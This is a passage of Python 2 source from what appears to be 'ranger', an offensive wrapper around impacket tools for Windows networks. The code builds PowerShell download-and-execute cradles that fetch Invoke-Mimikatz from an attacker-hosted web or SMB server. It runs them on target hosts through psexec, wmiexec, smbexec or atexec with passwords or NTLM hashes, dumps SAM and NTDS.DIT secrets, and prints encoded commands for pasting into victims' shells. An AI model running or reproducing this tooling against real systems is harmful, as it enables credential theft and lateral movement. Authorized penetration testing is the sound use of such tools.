elif self.delivery == "smb":
if self.argument:
text = "IEX (New-Object Net.WebClient).DownloadString('\\\%s\%s\%s'); %s %s" % (str(self.src_ip), str(self.share_name), str(self.payload), str(self.function), str(self.argument))
else:
text = "IEX (New-Object Net.WebClient).DownloadString('\\\%s\%s\%s'); %s" % (str(self.src_ip), str(self.share_name), str(self.payload), str(self.function))
self.command = self.packager(text)
self.unprotected_command = self.clearer(text)
print(self.command) #DEBUG
print(self.unprotected_command) #DEBUG
'''
LOCAL INTERFACE DETECTION FUNCTIONS
'''
def get_interfaces():
interfaces = netifaces.interfaces()
return interfaces
def get_gateways():
gateway_dict = {}
gws = netifaces.gateways()
for gw in gws:
try:
gateway_iface = gws[gw][netifaces.AF_INET]
gateway_ip, iface = gateway_iface[0], gateway_iface[1]
gw_list =[gateway_ip, iface]
gateway_dict[gw]=gw_list
except:
pass
return gateway_dict
def get_addresses(interface):
addrs = netifaces.ifaddresses(interface)
link_addr = addrs[netifaces.AF_LINK]
iface_addrs = addrs[netifaces.AF_INET]
iface_dict = iface_addrs[0]
link_dict = link_addr[0]
hwaddr = link_dict.get('addr')
iface_addr = iface_dict.get('addr')
iface_broadcast = iface_dict.get('broadcast')
iface_netmask = iface_dict.get('netmask')
return hwaddr, iface_addr, iface_broadcast, iface_netmask
def get_networks(gateways_dict):
networks_dict = {}
for key, value in gateways_dict.iteritems():
gateway_ip, iface = value[0], value[1]
hwaddress, addr, broadcast, netmask = get_addresses(iface)
network = {'gateway': gateway_ip, 'hwaddr' : hwaddress, 'addr' : addr, 'broadcast' : broadcast, 'netmask' : netmask}
networks_dict[iface] = network
return networks_dict
'''
HASH MANIPULATION FUNCTIONS
'''
def hash_test(LM, NTLM, pwd, usr, verbose):
if verbose > 1:
print("[*] Hash detected for %s") % (usr)
blank_ntlm = re.search(r'31d6cfe0d16ae931b73c59d7e0c089c0',NTLM, re.IGNORECASE)
blank_lm = re.search(r'aad3b435b51404eeaad3b435b51404ee',LM, re.IGNORECASE)
blank_lm_instances = len(re.findall(r'aad3b435b51404ee', LM, re.IGNORECASE))
bad_format = re.search(r'NOPASSWORD',LM, re.IGNORECASE)
if bad_format:
if verbose > 1:
print("[*] The hash for %s was badly formatted, so padding it") % (usr)
LM = "aad3b435b51404eeaad3b435b51404ee"
if blank_lm and blank_ntlm:
if verbose > 1:
print("[*] You do know the password for %s is blank right?") % (usr)
elif blank_lm_instances == 1 and not blank_lm:
if verbose > 1:
print("[*] The hashed password for %s is less than eight characters") % (usr)
elif blank_lm and blank_ntlm:
if verbos > 1:
print("[*] LM hashes are disabled for %s, so focus on cracking the NTLM") % (usr)
hash = LM + ":" + NTLM
if verbose > 1:
print("[*] Your formated hash for %s is: %s") % (usr, hash)
pwd = ""
return(LM, NTLM, pwd, hash)
'''
CATAPULT SERVER FUNCTIONS
'''
def delivery_server(port, working_dir, delivery_method, share_name):
sub_proc = None
if delivery_method == "web":
sub_proc = http_server(port, working_dir)
if delivery_method == "smb":
sub_proc == smb_server(working_dir, share_name)
return sub_proc
def http_server(port, working_dir):
devnull = open(os.devnull, 'w')
sub_proc = subprocess.Popen([sys.executable, '-m', 'SimpleHTTPServer', port], cwd=working_dir, stdout=devnull, stderr=devnull)
#sub_proc = subprocess.Popen([sys.executable, '-m', 'SimpleHTTPServer', port], cwd=working_dir)
#Test Server
test_request = "http://127.0.0.1:%s" % (port)
time.sleep(1) #DEBUG
try:
urllib2.urlopen(test_request).read()
print("[*] Catapult web server started successfully on port: %s in directory: %s") % (port, working_dir)
except Exception, e:
print("[!] Catapult web server failed to start")
print("[*] Verify the port is not already in use")
sub_proc.terminate()
sub_proc = None
return sub_proc
def smb_server(working_dir, share_name):
note = ''
try:
smb_srv = smbserver.SimpleSMBServer()
smb_srv.addShare(share_name.upper(), working_dir, note)
smb_srv.setSMB2Support(False)
smb_srv.setSMBChallenge('')
smb_srv.setLogFile('')
sub_proc = subprocess.Popen([smb_srv.start()])
except Exception, e:
print("[!] Catapult smb server failed to start")
# TODO: ADD IN TEST CASE FOR VERIFYING SMB SERVER STARTED USING pysmb
return sub_proc
'''
METHOD FUNCTIONS
'''
def atexec_func(dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, scan_type, verbose, verify_port, encoder, timeout_value):
srv = None
if hash and not pwd:
print("[-] --atexec requires a password, please try a different user or crack hash %s for user %s") % (hash, usr)
return
if scan_type:
state = verify_open(verbose, scan_type, verify_port, dst)
if not state:
if verbose > 1:
print("[-] Host %s port %s is closed") % (dst, verify_port)
return #replaced continue inside a function
if hash:
print("[*] Attempting to access the system %s with, user: %s hash: %s domain: %s ") % (dst, usr, hash, dom)
else:
print("[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s ") % (dst, usr, pwd, dom)
if command == "cmd.exe":
sys.exit("[!] Please provide a viable command for execution")
if attacks and encoder:
srv = delivery_server(src_port, cwd, delivery, share_name)
if not srv:
sys.exit("[!] To execute this attack the catapult server needs to start")
with Timeout(timeout_value):
try:
shell = ATSVC_EXEC(username = usr, password = pwd, domain = dom, command = command, proto = protocol)
shell.play(dst)
except (Exception, KeyboardInterrupt), e:
print("[!] An error occured: %s") % (e)
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
return
elif attacks and not encoder:
srv = delivery_server(src_port, cwd, delivery, share_name)
if not srv:
sys.exit("[!] To execute this attack the catapult server needs to start")
with Timeout(timeout_value):
try:
shell = ATSVC_EXEC(username = usr, password = pwd, domain = dom, command = unprotected_command, proto = protocol)
shell.play(dst)
except (Exception, KeyboardInterrupt), e:
print("[!] An error occured: %s") % (e)
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
return
else:
with Timeout(timeout_value):
try:
shell = ATSVC_EXEC(username = usr, password = pwd, domain = dom, command = unprotected_command, proto = protocol)
shell.play(dst)
except (Exception, KeyboardInterrupt), e:
print("[!] An error occured: %s") % (e)
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
return
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s" % (str(delivery), str(dst)))
def psexec_func(dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, kerberos, aes, mode, share, instructions, directory, scan_type, verbose, verify_port, timeout_value):
srv = None
if scan_type:
state = verify_open(verbose, scan_type, verify_port, dst)
if not state:
if verbose > 1:
print("[-] Host %s port %s is closed") % (dst, verify_port)
return #replaced continue inside a function
if attacks:
#print(instructions)
srv = delivery_server(src_port, cwd, delivery, share_name)
if not srv:
sys.exit("[!] To execute this attack the catapult server needs to start")
if hash:
print("[*] Attempting to access the system %s with, user: %s hash: %s domain: %s ") % (dst, usr, hash, dom)
else:
print("[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s ") % (dst, usr, pwd, dom)
try:
shell = PSEXEC(command, path=directory, protocols=protocol, username = usr, password = pwd, domain = dom, hashes = hash, copyFile = None, exeFile = None, aesKey = aes, doKerberos = kerberos)
shell.run(dst)
except (Exception, KeyboardInterrupt), e:
print("[!] An error occured: %s") % (e)
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
return
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
def smbexec_func(dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, kerberos, aes, mode, share, instructions, scan_type, verbose, verify_port, timeout_value):
srv = None
if scan_type:
state = verify_open(verbose, scan_type, verify_port, dst)
if not state:
if verbose > 1:
print("[-] Host %s port %s is closed") % (dst, verify_port)
return #replaced continue inside a function
if attacks:
print(instructions)
srv = delivery_server(src_port, cwd, delivery, share_name)
if not srv:
sys.exit("[!] To execute this attack the catapult server needs to start")
if hash:
print("[*] Attempting to access the system %s with, user: %s hash: %s domain: %s ") % (dst, usr, hash, dom)
else:
print("[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s ") % (dst, usr, pwd, dom)
try:
shell = CMDEXEC(protocols = protocol, username = usr, password = pwd, domain = dom, hashes = hash, aesKey = aes, doKerberos = kerberos, mode = mode, share = share)
shell.run(dst)
except (Exception, KeyboardInterrupt), e:
print("[!] An error occured: %s") % (e)
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
return
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
def wmiexec_func(dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, kerberos, aes, mode, share, instructions, no_output, scan_type, verbose, verify_port, encoder, timeout_value):
srv = None
if scan_type:
state = verify_open(verbose, scan_type, verify_port, dst)
if not state:
if verbose > 1:
print("[-] Host %s port %s is closed") % (dst, verify_port)
return #replaced continue inside a function
if attacks and encoder:
if hash:
print("[*] Attempting to access the system %s with, user: %s hash: %s domain: %s ") % (dst, usr, hash, dom)
else:
print("[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s ") % (dst, usr, pwd, dom)
if command == "cmd.exe":
sys.exit("[!] You must provide a command or attack for exploitation if you are using wmiexec")
with Timeout(timeout_value):
try:
srv = delivery_server(src_port, cwd, delivery, share_name)
if not srv:
sys.exit("[!] To execute this attack the catapult server needs to start")
shell = WMIEXEC(unprotected_command, username = usr, password = pwd, domain = dom, hashes = hash, aesKey = aes, share = share, noOutput = no_output, doKerberos=kerberos)
shell.run(dst)
except (Exception, KeyboardInterrupt), e:
print("[!] An error occurred: %s") % (e)
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
print("[-] Could not execute the command against %s using the domain %s user %s and password %s") % (dst, dom, usr, pwd)
return #replaced continue inside a function
elif attacks and not encoder:
if hash:
print("[*] Attempting to access the system %s with, user: %s hash: %s domain: %s ") % (dst, usr, hash, dom)
else:
print("[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s ") % (dst, usr, pwd, dom)
if command == "cmd.exe":
sys.exit("[!] You must provide a command or attack for exploitation if you are using wmiexec")
with Timeout(timeout_value):
try:
srv = delivery_server(src_port, cwd, delivery, share_name)
if not srv:
sys.exit("[!] To execute this attack the catapult server needs to start")
shell = WMIEXEC(unprotected_command, username = usr, password = pwd, domain = dom, hashes = hash, aesKey = aes, share = share, noOutput = no_output, doKerberos=kerberos)
shell.run(dst)
except (Exception, KeyboardInterrupt), e:
print("[!] An error occurred: %s") % (e)
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
print("[-] Could not execute the command against %s using the domain %s user %s and password %s") % (dst, dom, usr, pwd)
return #changed from continue inside a function
elif attacks:
if hash:
print("[*] Attempting to access the system %s with, user: %s hash: %s domain: %s ") % (dst, usr, hash, dom)
else:
print("[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s ") % (dst, usr, pwd, dom)
if command == "cmd.exe":
sys.exit("[!] You must provide a command or attack for exploitation if you are using wmiexec")
with Timeout(timeout_value):
try:
srv = delivery_server(src_port, cwd, delivery, share_name)
if not srv:
sys.exit("[!] To execute this attack the catapult server needs to start")
shell = WMIEXEC(command, username = usr, password = pwd, domain = dom, hashes = hash, aesKey = aes, share = share, noOutput = no_output, doKerberos=kerberos)
shell.run(dst)
except (Exception, KeyboardInterrupt), e:
print("[!] An error occurred: %s") % (e)
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
print("[-] Could not execute the command against %s using the domain %s user %s and password %s") % (dst, dom, usr, pwd)
return # changed from continue inside a function
else:
if hash:
print("[*] Attempting to access the system %s with, user: %s hash: %s domain: %s ") % (dst, usr, hash, dom)
else:
print("[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s ") % (dst, usr, pwd, dom)
if command == "cmd.exe":
sys.exit("[!] You must provide a command or attack for exploitation if you are using wmiexec")
with Timeout(timeout_value):
try:
shell = WMIEXEC(command, username = usr, password = pwd, domain = dom, hashes = hash, aesKey = aes, share = share, noOutput = no_output, doKerberos=kerberos)
shell.run(dst)
except (Exception, KeyboardInterrupt), e:
if srv:
srv.terminate()
print("[*] Shutting down the catapult %s server for %s") % (str(delivery), str(dst))
print("[-] Could not execute the command against %s using the domain %s user %s and password %s") % (dst, dom, usr, pwd)
return # changed from continue inside a function
def netview_func(dst, usr, pwd, dom, hash, aes, kerberos, final_targets, methods, scan_type, verbose, verify_port, timeout_value):
if scan_type:
state = verify_open(verbose, scan_type, verify_port, dst)
if not state:
if verbose > 1:
print("[-] Host %s port %s is closed") % (dst, verify_port)
return #replaced continue inside a function
if methods:
sys.exit("[!] The --scout option is run without methods")
if hash:
print("[*] Attempting to access the system %s with, user: %s hash: %s domain: %s ") % (dst, usr, hash, dom)
else:
print("[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s ") % (dst, usr, pwd, dom)
opted = NetviewDetails(user = None, users = None, target = dst, targets = None, noloop = True, delay = '10', max_connections = '1000', domainController = None, debug = False)
try:
shell = USERENUM(username = usr, password = pwd, domain = dom, hashes = hash, aesKey = aes, doKerberos = kerberos, options=opted)
shell.run()
except (Exception, KeyboardInterrupt), e:
print("[!] An error occured: %s") % (e)
return
def sam_dump_func(dst, usr, hash, dom, aes, kerberos, system, security, sam, ntds, pwd, scan_type, verbose, verify_port, timeout_value):
if scan_type:
state = verify_open(verbose, scan_type, verify_port, dst)
if not state:
if verbose > 1:
print("[-] Host %s port %s is closed") % (dst, verify_port)
return #replaced continue inside a function
if hash:
print("[*] Attempting to access the system %s with, user: %s hash: %s domain: %s ") % (dst, usr, hash, dom)
else:
print("[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s ") % (dst, usr, pwd, dom)
shell = DumpSecrets(address = dst, username = usr, password = pwd, domain = dom, hashes = hash, aesKey = aes, doKerberos = kerberos, system = system, security = security, sam = sam, ntds = ntds)
try:
shell.dump()
except (Exception, KeyboardInterrupt), e:
print("[!] An error occured during execution")
return
def instructions_func(payload, src_port, command, unprotected_command, smbexec_cmd, execution, delivery):
if "web" in delivery and "invoker" or "executor" in execution:
prep = '''[*] Place the PowerShell script ''' + str(payload) + ''' in an empty directory, or use the default /opt/ranger/web.
[*] Start-up your Python web server as follows Python SimpleHTTPServer ''' + str(src_port) + '''.'''
post = '''\n[*] Copy and paste one of the following commands into the target boxes command shell.
[+] This command is unencoded:\n''' + unprotected_command + '''\n
[+] This command is double encoded:\n''' +command
if smbexec_cmd:
instructions = post
else:
instructions = prep + post
elif "smb" in delivery and "invoker" or "executor" in execution:
prep = '''[*] Place the PowerShell script ''' + str(payload) + ''' in an empty directory, or use the default /opt/ranger/smb.
[*] Start-up your samba server.'''
post ='''[*] Copy and paste one of the following commands into the target boxes command shell.
[+] This command is unencoded:\n''' + unprotected_command + '''\n
[+] This command is double encoded:\n''' + command
if smbexec_cmd:
instructions = post
else:
instructions = prep + post
elif "downloader" in execution:
prep = '''[*] If you have not already done this, start-up your Metasploit module exploit/multi/script/web_delivery.
[*] Make sure to select the PowerShell and copy the payload name for this script and set the URIPATH to /.'''
post = '''[*] Copy and paste one of the following commands into the target boxes command shell.
[+] This command is unencoded:\n''' + unprotected_command + '''\n
[+] This command is double encoded:\n''' +command
if smbexec_cmd:
instructions = post
else:
instructions = prep + post
return(instructions)
'''
NMAP FUNCTIONS
'''
def unique_host_dict(hosts, verbose):
count = 0
hosts_dict = {}
processed_hosts = {}
if not hosts:
sys.exit("[!] There was an issue processing the data")
for inst in hosts:
hosts_temp = inst.hosts_return()
if hosts_temp is not None:
for k, v in hosts_temp.iteritems():
hosts_dict[count] = v
count+=1
hosts_temp.clear()
if verbose > 2:
for key, value in hosts_dict.iteritems():
print("[*] Key: %s Value: %s") % (key,value)
temp = [(k, hosts_dict[k]) for k in hosts_dict]
temp.sort()
key = 0
for k, v in temp:
compare = lambda x, y: collections.Counter(x) == collections.Counter(y)
if str(v) in str(processed_hosts.values()):
continue
else:
key+=1
processed_hosts[key] = v
return(processed_hosts)
def xml_list_process(xml, verbose):
xml_list = []
hosts = []
# Instantiation for proof of concept
if "," in xml:
xml_list = xml.split(',')
else:
xml_list.append(xml)
for x in xml_list:
try:
tree_temp = etree.parse(x)
except:
sys.exit("[!] Cannot open XML file: %s \n[-] Ensure that your are passing the correct file and format" % (x))
try:
root = tree_temp.getroot()
name = root.get("scanner")
if name is not None and "nmap" in name:
if verbose > 1:
print ("[*] File being processed is an NMAP XML")
hosts.append(Nmap_parser(x, verbose))
else:
print("[!] File % is not an NMAP XML") % (str(x))
sys.exit(1)
except Exception, e:
print("[!] Processing of file %s failed %s") % (str(x), str(e))
sys.exit(1)
processed_hosts = unique_host_dict(hosts, verbose)
return(processed_hosts)
def verify_open(verbose, scan_type, port, dst):
nm = nmap.PortScanner()
if "tcp" in scan_type:
if verbose > 1:
print("[*] Checking to see if the port %s is open on %s by TCP Connect scan") % (port, dst)
scan_args = '-sT -p %s' % (port)
nm.scan(hosts=dst, arguments=scan_args)
elif "syn" in scan_type:
if verbose > 1:
print("[*] Checking to see if the port %s is open on %s by SYN Scan scan") % (port, dst)
scan_args = '-sS -p %s' % (port)
nm.scan(hosts=dst, arguments=scan_args)
try:
output = nm[dst]['tcp'][int(port)]['state']
except Exception, e:
output = "closed"
if "open" in output:
return(True)
else:
return(False)
def pwd_test(pwd, verbose, usr = None):
SID = None
NTLM = ""
LM = ""
hash = None
if pwd and ":" in pwd and pwd.count(':') == 6:
pwdump_format_hash = pwd.split(':')
if not usr:
usr = pwdump_format_hash[0].lower()
SID = pwdump_format_hash[1]
LM = pwdump_format_hash[2]
NTLM = pwdump_format_hash[3]
pwd = None
if re.match('[0-9A-Fa-f]{32}', LM) or re.match('[0-9A-Fa-f]{32}', NTLM):
LM, NTLM, pwd, hash = hash_test(LM, NTLM, pwd, usr, verbose)
if pwd and ":" in pwd and pwd.count(':') == 1:
if pwd.startswith(':'):
LM, NTLM = pwd.split(':')
if LM == "":
LM = "aad3b435b51404eeaad3b435b51404ee"
else:
LM, NTLM = pwd.split(':')
if re.match('[0-9A-Fa-f]{32}', LM) or re.match('[0-9A-Fa-f]{32}', NTLM):
LM, NTLM, pwd, hash = hash_test(LM, NTLM, pwd, usr, verbose)
return(SID, LM, NTLM, hash, usr, pwd)
def is_empty(structure):
if structure:
return False
else:
return True
def method_func(psexec_cmd, wmiexec_cmd, netview_cmd, smbexec_cmd, atexec_cmd, sam_dump, dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, kerberos, aes, mode, share, instructions, directory, scan_type, verbose, verify_port, final_targets, system, security, sam, ntds, no_output, encoder, timeout_value, sleep_value):
if psexec_cmd:
for dst in final_targets:
psexec_func(dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, kerberos, aes, mode, share, instructions, directory, scan_type, verbose, verify_port, timeout_value)
time.sleep(sleep_value)
elif wmiexec_cmd:
for dst in final_targets:
wmiexec_func(dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, kerberos, aes, mode, share, instructions, no_output, scan_type, verbose, verify_port, encoder, timeout_value)
time.sleep(sleep_value)
elif netview_cmd:
for dst in final_targets:
netview_func(dst, usr, pwd, dom, hash, aes, kerberos, final_targets, methods, scan_type, verbose, verify_port, timeout_value)
time.sleep(sleep_value)
elif smbexec_cmd:
for dst in final_targets:
smbexec_func(dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, kerberos, aes, mode, share, instructions, scan_type, verbose, verify_port, timeout_value)
time.sleep(sleep_value)
elif atexec_cmd:
for dst in final_targets:
atexec_func(dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, scan_type, verbose, verify_port, encoder, timeout_value)
time.sleep(sleep_value)
elif sam_dump:
for dst in final_targets:
sam_dump_func(dst, usr, hash, dom, aes, kerberos, system, security, sam, ntds, pwd, scan_type, verbose, verify_port, timeout_value)
time.sleep(sleep_value)
else:
print(instructions)
def main():
# If script is executed at the CLI
usage = '''
Find Logged In Users
%(prog)s [--usr Administrator] [--pwd Password1] [-dom Domain] --scout
Command Shell:
%(prog)s [--usr Administrator] [--pwd Password1] [-dom Domain] [-t target] --smbexec -q -v -vv -vvv
Attack Directly:
%(prog)s [--usr Administrator] [--pwd Password1] [-dom Domain] [-t target] --wmiexec --invoker
Create Pasteable Double Encoded Script:
%(prog)s --invoker -q -v -vv -vvv
'''
parser = argparse.ArgumentParser(usage=usage, description="A wrapping and execution tool for a some of the most useful impacket tools", epilog="This script oombines specific attacks with dynmaic methods, which allow you to bypass many protective measures.")
group1 = parser.add_argument_group('Method')
group2 = parser.add_argument_group('Attack')
group3 = parser.add_argument_group('SAM and NTDS.DIT Options, used with --secrets-dump')
iex_options = parser.add_argument_group('Payload options to tell ranger where to source the attack information')
remote_attack = parser.add_argument_group('Remote Target Options')
#generator = parser.add_argument_group('Filename for randimization of script')
obfiscation = parser.add_argument_group('Tools to obfiscate the execution of scripts')
method = group1.add_mutually_exclusive_group()
attack = group2.add_mutually_exclusive_group()
sam_dump_options = group3.add_mutually_exclusive_group()
iex_options.add_argument("-i", action="store", dest="src_ip", default=None, help="Sets the IP address your attacks will come from defaults to eth0 IP")
iex_options.add_argument("-n", action="store", dest="interface", default="eth0", help="Sets the interface your attacks will come from if you do not use the default, default eth0")
iex_options.add_argument("-p", action="store", dest="src_port", default="8000", help="Set the port the Mimikatz server is on, defaults to port 8000")
iex_options.add_argument("-x", action="store", dest="payload", default=None, help="The name of the file to injected, the default is Invoke-Mimikatz.ps1")
iex_options.add_argument("-a", action="store", dest="mim_arg", default=None, help="Allows you to set the argument")
iex_options.add_argument("-f", action="store", dest="mim_func", default=None, help="Allows you to set the function or cmdlet name")
attack.add_argument("--invoker", action="store_true", dest="invoker", help="Executes Mimikatz-Invoker against target systtems")
attack.add_argument("--downloader", action="store_true", dest="downloader", help="Configures the command to use Metasploit's exploit/multi/script/web_delivery")
attack.add_argument("--secrets-dump", action="store_true", dest="sam_dump", help="Execute a SAM table dump")
attack.add_argument("--executor", action="store_true", dest="executor", help="Execute a PowerShell Script")
attack.add_argument("--command", action="store", dest="command", default="cmd.exe", help="Set the command that will be executed, default is cmd.exe")
attack.add_argument("--domain-group-members", action="store", dest="domain_group", help="Identifies members of Domain Groups through PowerShell")
attack.add_argument("--local-group-members", action="store", dest="local_group", help="Identifies members of Local Groups through PowerShell")
attack.add_argument("--get-domain", action="store_true", dest="get_domain", default=False, help="Identifies current user's Domain")
attack.add_argument("--get-forest-domains", action="store_true", dest="get_forest_domains", default=False, help="Identifies current user's Domains within the Forest")
attack.add_argument("--get-forest", action="store_true", dest="get_forest", default=False, help="Identifies current user's Forrest")
attack.add_argument("--get-dc", action="store_true", dest="get_dc", default=False, help="Identifies current user's Domain Controllers")
attack.add_argument("--find-la-access", action="store_true", dest="find_local_admin_access", default=False, help="Identifies systems the current user has local admin access to")
remote_attack.add_argument("-t", action="store", dest="target", default=None, help="The targets you are attempting to exploit, multiple items can be comma seperated: Accepts IPs, CIDR, Short and Long Ranges")
remote_attack.add_argument("-e", action="store", dest="exceptor", default=None, help="The exceptions to the targets you do not want to exploit, yours is inlcuded by default, multiple items can be comma seperated: Accepts IPs, CIDR, Short and Long Ranges")
remote_attack.add_argument("-tl", action="store", dest="target_filename", default=None, help="The targets file with systems you want to exploit, delinated by new lines, multiple files can be comma separated")
remote_attack.add_argument("-el", action="store", dest="exception_filename", default=None, help="The exceptions file with systems you do not want to exploit, delinated by new lines, multiple files can be comma separated")
remote_attack.add_argument("-tnX", action="store", dest="xml_targets", default=None, help="The targets nmap XML with systems you want to exploit, multiple files can be comma separated")
remote_attack.add_argument("-enX", action="store", dest="xml_exceptions", default=None, help="The exceptions nmap XML with systems you do not want to exploit, multiple files can be comma separted")
remote_attack.add_argument("-sT", action="store_true", dest="scan_tcp", default=False, help="Verify the port is open with nmap TCP Connection scan prior to exploitation")
remote_attack.add_argument("-sS", action="store_true", dest="scan_syn", default=False, help="Verify the port is open with nmap SYN Stealth scan prior to exploitation")
remote_attack.add_argument("--dom", action="store", dest="dom", default="WORKGROUP", help="The domain the user is apart of, defaults to WORKGROUP")
remote_attack.add_argument("--usr", action="store", dest="usr", default=None, help="The username that will be used to exploit the system")
remote_attack.add_argument("--pwd", action="store", dest="pwd", default=None, help="The password that will be used to exploit the system")
remote_attack.add_argument("--creds-file", action="store", dest="creds_file", default=None, help="A file with multiple lines of credentials with each element deliniated by a space, domains are optional in the file, and can be applied universally to all creds with the --dom argument, the same hash formats accepted by command line are accepted in the file to include Metasploit PWDUMP, Metasploit hash_dump and smart_hash_dump formats, each line of the file should be formated as one of the following: username password, username hash, username password domain, username hash, Hash_in_PWDUMP_format, Hash_in_PWDUMP_format domain")
method.add_argument("--psexec", action="store_true", dest="psexec_cmd", help="Inject the invoker process into the system memory with psexec")
method.add_argument("--wmiexec", action="store_true", dest="wmiexec_cmd", help="Inject the invoker process into the system memory with wmiexec")
method.add_argument("--smbexec", action="store_true", dest="smbexec_cmd", help="Inject the invoker process into the system memory with smbexec")
method.add_argument("--atexec", action="store_true", dest="atexec_cmd", help="Inject the command task into the system memory with at on systems older than Vista")
attack.add_argument("--scout", action="store_true", dest="netview_cmd", help="Identify logged in users on a target machine")
#generator.add_argument("--filename", action="store", dest="filename", default=None, help="The file that the attack script will be dumped to")
remote_attack.add_argument("--domain", action="store", dest="target_dom", default=None, help="When querying for details of different domains")
remote_attack.add_argument("--aes", action="store", dest="aes_key", default=None, help="The AES Key Option")
remote_attack.add_argument("--share", action="store", default="ADMIN$", dest="share", help="The Share to execute against, the default is ADMIN$")
remote_attack.add_argument('--mode', action="store", dest="mode", choices=['SERVER','SHARE'], default="SERVER", help="Mode to use for --smbexec, default is SERVER, which requires root access, SHARE does not")
remote_attack.add_argument("--protocol", action="store", dest="protocol", choices=['445/SMB','139/SMB'], default="445/SMB", help="The protocol to attack over, the default is 445/SMB")
remote_attack.add_argument("--directory", action="store", dest="directory", default="C:\\", help="The directory to either drop the payload or instantiate the session")
remote_attack.add_argument("--timeout", action="store", dest="timeout_value", default=30, help="How long you want a test to wait before it is cancelled, the default is 30 seconds")
remote_attack.add_argument("--sleep", action="store", dest="sleep_value", default=0, help="How many seconds you want to delay each iteration of tests when multiple hosts or credentials are provided, the default is 0")
sam_dump_options.add_argument("--system", action="store", help="The SYSTEM hive to parse")
sam_dump_options.add_argument("--security", action="store", help="The SECURITY hive to parse")
sam_dump_options.add_argument("--sam", action="store", help="The SAM hive to parse")
sam_dump_options.add_argument("--ntds", action="store", help="The NTDS.DIT file to parse")
obfiscation.add_argument("--encoder", action="store_true", help="Set to encode the commands that are being executed")
#obfiscation.add_argument("--delivery", action="store", dest="delivery", choices=['web','smb'], default="web", help="Set the type of catapult server the payload will be downloaded from, web or smb")
obfiscation.add_argument("--share-name", action="store", dest="share_name", default="ranger", help="Provide a specific share name to reference with SMB delivery")
parser.add_argument("-l", "--logfile", action="store", dest="log", default="/opt/ranger/log/results.log", type=str, help="The log file to output the results")
parser.add_argument("-v", action="count", dest="verbose", default=1, help="Verbosity level, defaults to one, this outputs each command and result")
parser.add_argument("-q", action="store_const", dest="verbose", const=0, help="Sets the results to be quiet")
parser.add_argument("--update", action="store_true", dest="update", default=False, help="Updates ranger and the supporting libraries")
parser.add_argument('--version', action='version', version='%(prog)s 0.43b')
args = parser.parse_args()
# Argument Validator
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
if args.update:
try:
os.system("wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh -O /root/setup.sh && chmod a+x /root/setup.sh")
except Exception, e:
print("[!] An error occurred downloading the update files: %s") % (e)
try:
os.system("/root/setup.sh && rm /root/setup.sh")
except Exception, e:
print("[!] An error occurred when executing the installation script: %s") % (e)
# Set Constructors
verbose = args.verbose # Verbosity level
src_port = args.src_port # Port to source the Mimikatz script on
#delivery = args.delivery # Uncomment when delivery option for SMB works
delivery = "web"
share_name = args.share_name
log = args.log
if ".log" not in log:
log = log + ".log"
level = logging.DEBUG # Logging level
format = logging.Formatter("%(asctime)s [%(levelname)-5.5s] %(message)s") # Log format
logger_obj = logging.getLogger() # Getter for logging agent
file_handler = logging.FileHandler(args.log) # File Handler
#stderr_handler = logging.StreamHandler() # STDERR Handler
timeout_value = int(args.timeout_value)
sleep_value = int(args.sleep_value)
src_ip = args.src_ip # IP to source the Mimikatz script on
payload = args.payload # The name of the payload that will be used
interface = args.interface # The interface to grab the IP from
mim_func = args.mim_func # The function that is executed
mim_arg = args.mim_arg # The argument processed by the function
invoker = args.invoker # Holds the results for invoker execution
executor = args.executor # Holds the results for the executor attack
downloader = args.downloader # Holds the results for exploit/multi/script/web_delivery
smbexec_cmd = args.smbexec_cmd # Holds the results for smbexec execution
wmiexec_cmd = args.wmiexec_cmd # Holds the results for the wmiexec execution
psexec_cmd = args.psexec_cmd # Holds the results for the psexec execution
atexec_cmd = args.atexec_cmd
get_domain = args.get_domain
get_forest = args.get_forest
get_forest_domains = args.get_forest_domains
find_local_admin_access = args.find_local_admin_access
get_dc = args.get_dc
netview_cmd = args.netview_cmd
target_dom = args.target_dom
aes = args.aes_key
share = args.share
protocol = args.protocol
directory = args.directory
usr = args.usr
pwd = args.pwd
dom = args.dom
target = args.target
target_filename = args.target_filename
exceptor = args.exceptor
exception_filename = args.exception_filename
command = args.command
#filename = args.filename
sam_dump = args.sam_dump
mode = args.mode.upper()
system = args.system
security = args.security
sam = args.sam
ntds = args.ntds
domain_group = args.domain_group
local_group = args.local_group
